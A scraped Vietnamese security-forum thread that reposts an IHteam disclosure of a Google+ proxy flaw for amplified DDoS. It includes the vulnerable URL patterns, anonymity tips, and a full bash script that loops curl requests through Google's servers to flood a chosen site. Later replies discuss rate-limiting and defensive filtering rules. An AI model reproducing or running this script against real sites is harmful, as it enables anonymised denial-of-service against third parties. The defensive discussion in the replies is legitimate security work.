<![CDATA[Latest posts for the topic "Make Requests Through Google Servers DDos (IHteam)!"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Make Requests Through Google Servers DDos (IHteam)! How does it work? The vulnerable pages are “/_/sharebox/linkpreview/“ and “gadgets/proxy?“ Is possible to request any file type, and G+ will download and show all the content. So, if you parallelize so many requests, is possible to DDoS any site with Google bandwidth. Is also possible to start the attack without be logged in G+. Attack vectors: The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs. But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/ Also the Sql injection Time attack will work using this method. DDoS attack is just an example, do not start ddos for no reason Pratical examples: https://plus.google.com/_/sharebox/linkpreview/?c=<SITE>&t=1&_reqid=<RANDOM_NUMBERS>&rt=j or https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=<SITE>&container=focus code
#!/bin/bash # Bug found by # # Simone 'R00T_ATI' Quatrini # # Mauro 'epicfail' Gasperini # # Site: http://www.ihteam.net # function start { echo "[*] Sending `echo $2` Requests..." for a in `seq $2` do id=$((RANDOM%3999999+3000000)) nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 & nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 & done echo "[*] Still attacking `echo $urlclear`" echo "[*] Sleeping for 10 Seconds" sleep 10 start url $2 urlclear } echo '' echo ' 88888888ba, 88888888ba, ad88888ba ' echo ' aa 88 `"8b 88 `"8b d8" "8b ' echo ' 88 88 `8b 88 `8b Y8, ' echo 'aaaa88aaaa 88 88 88 88 ,adPPYba, `Y8aaaaa, ' echo '""""88"""" 88 88 88 88 a8" "8a `"""""8b, ' echo ' 88 88 8P 88 8P 8b d8 `8b ' echo ' "" 88 .a8P 88 .a8P "8a, ,a8" Y8a a8P ' echo ' 88888888Y"" 88888888Y"" `"YbbdP"" "Y88888P"' echo '' if [ "$#" -lt 2 ]; then echo "Usage: $0 <big file> <Requests>" echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000" echo "" exit 0 fi case $2 in *[!0-9]* ) echo "$2 is not numeric" && exit 1;; esac echo "Attack -->" $1 match1=/ repl1=%2F match2=: repl2=%3A url=$1 urlclear=$1 url=${url//$match1/$repl1} url=${url//$match2/$repl2} echo "" echo "[*] Loop started! CTRL+C to stop" echo "" start url $2 urlclear  
Các bác có thông tin gì thêm về việc này không. từ ngày hva bị DDos đến vietnamnet cứ đi đâu nhìn thấy chữ này là mình sôi cả tiết, các anh STL có thấy thì bỏ qua nhé. Đừng thực hành làm gì :))]]>
/hvaonline/posts/list/39969.html#246403 /hvaonline/posts/list/39969.html#246403 GMT
Make Requests Through Google Servers DDos (IHteam)! https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=http://vnexpress.net/Files/Subject/3b/a2/e5/11/clinton2.jpg&container=focus  Google server sẽ get file trên về và hồi trả lại với đuôi *.txt]]> /hvaonline/posts/list/39969.html#246407 /hvaonline/posts/list/39969.html#246407 GMT Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/list/39969.html#246433 /hvaonline/posts/list/39969.html#246433 GMT Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/list/39969.html#246993 /hvaonline/posts/list/39969.html#246993 GMT Make Requests Through Google Servers DDos (IHteam)!

ga_cum06 wrote:
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt 
Thật ra ddos ở dạng này khó tạo dung hại tối đa bởi vì chính google sẽ giới hạn số lượng lớn requests. Đây là một dạng sử dụng google như proxy và nếu tạo một cái script để gởi hàng loạt requests như vậy thì đến một lúc nào đó sẽ bị chặn. Tuy nhiên, gần đây thấy có nhiều bạn "thử nghiệm" quá cho nên fix luôn phía HVA cho yên :P .]]>
/hvaonline/posts/list/39969.html#247289 /hvaonline/posts/list/39969.html#247289 GMT
Make Requests Through Google Servers DDos (IHteam)!

conmale wrote:

ga_cum06 wrote:
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt 
Thật ra ddos ở dạng này khó tạo dung hại tối đa bởi vì chính google sẽ giới hạn số lượng lớn requests. Đây là một dạng sử dụng google như proxy và nếu tạo một cái script để gởi hàng loạt requests như vậy thì đến một lúc nào đó sẽ bị chặn. Tuy nhiên, gần đây thấy có nhiều bạn "thử nghiệm" quá cho nên fix luôn phía HVA cho yên :P . 
Em đang tự hỏi liệu HVA đang lọc USER-AGENT và IP của google dể không cản trở google BOT lấy thông tin nên mới xảy ra hiện tượng này :-/. Như anh conmale nói thì liệu dùng proxy trước khi tạo truy vấn tới google thì có bị google hạn chế không :-/ (Em không hỏi về phía HVA). ]]>
/hvaonline/posts/list/39969.html#247467 /hvaonline/posts/list/39969.html#247467 GMT
Make Requests Through Google Servers DDos (IHteam)!

chiro8x wrote:

conmale wrote:

ga_cum06 wrote:
12:18 13/09/2011 vẫn chưa khắc phục lỗi trên. vẫn get về file p.txt 
Thật ra ddos ở dạng này khó tạo dung hại tối đa bởi vì chính google sẽ giới hạn số lượng lớn requests. Đây là một dạng sử dụng google như proxy và nếu tạo một cái script để gởi hàng loạt requests như vậy thì đến một lúc nào đó sẽ bị chặn. Tuy nhiên, gần đây thấy có nhiều bạn "thử nghiệm" quá cho nên fix luôn phía HVA cho yên :P . 
Em đang tự hỏi liệu HVA đang lọc USER-AGENT và IP của google dể không cản trở google BOT lấy thông tin nên mới xảy ra hiện tượng này :-/. Như anh conmale nói thì liệu dùng proxy trước khi tạo truy vấn tới google thì có bị google hạn chế không :-/ (Em không hỏi về phía HVA).  
"Hiện tượng này" là hiện tượng nào? Dùng bất cứ cái gì để truy vấn URL trên của google để gởi hàng loạt requests đến "nạn nhân" thì đến lúc nào đó google sẽ cản bởi vì google sẽ nhận ra sự bất thường. Tất nhiên nếu núp đằng sau hàng loạt anonymous proxies để thực hiện vụ này thì google sẽ detect sự bất thường chậm hơn. Chỉ có điều, lôi đâu ra hàng loạt anonymous proxies sống dai dẳng để làm chuyện này? Đó là chưa kể trường hợp truy cập qua anonymous proxy thường chậm như rùa và có đủ thứ phiền toái khác.]]>
/hvaonline/posts/list/39969.html#247472 /hvaonline/posts/list/39969.html#247472 GMT
Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/list/39969.html#247538 /hvaonline/posts/list/39969.html#247538 GMT Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/list/39969.html#247613 /hvaonline/posts/list/39969.html#247613 GMT Make Requests Through Google Servers DDos (IHteam)! /hvaonline/posts/list/39969.html#247622 /hvaonline/posts/list/39969.html#247622 GMT Make Requests Through Google Servers DDos (IHteam)!

ga_cum06 wrote:
@chiro8x: có lẽ bạn chưa đọc kí bug này, đây là lỗi của server google plus chứ ko phải bot google :D 
Có lẽ bạn không hiểu ý mình ! mình đang nói là IP của google và User-Agent của google. Và thứ anh conmale nói là căn bệnh SEO. Mình sẽ rút kình nghiệm lần sau sẽ viết bài rõ hơn. ]]>
/hvaonline/posts/list/39969.html#247651 /hvaonline/posts/list/39969.html#247651 GMT
Make Requests Through Google Servers DDos (IHteam)!

conmale wrote:
1. Vẫn cho phép các chuỗi IP của google access và kiểm tra user-agent. 2. Nếu user-agent đúng là của google nhưng IP không thuộc google --> trảm đẹp. 3. Nếu user-agent và IP đúng là của google, nhưng "fetch" mà lại không đụng gì tới một URI có rss (feed) thì ---> trảm nốt. 
Cảm ơn anh vì gợi ý, ở điều 1 và 2 có thể gộp chung lại thành 1 Rule [chain] trong Mod_Security Còn điều 3 em sẽ tìm hiểu thêm. Bạn nào cần xem tại đây: /hvaonline/readingRoom/item/237042.html]]>
/hvaonline/posts/list/39969.html#247655 /hvaonline/posts/list/39969.html#247655 GMT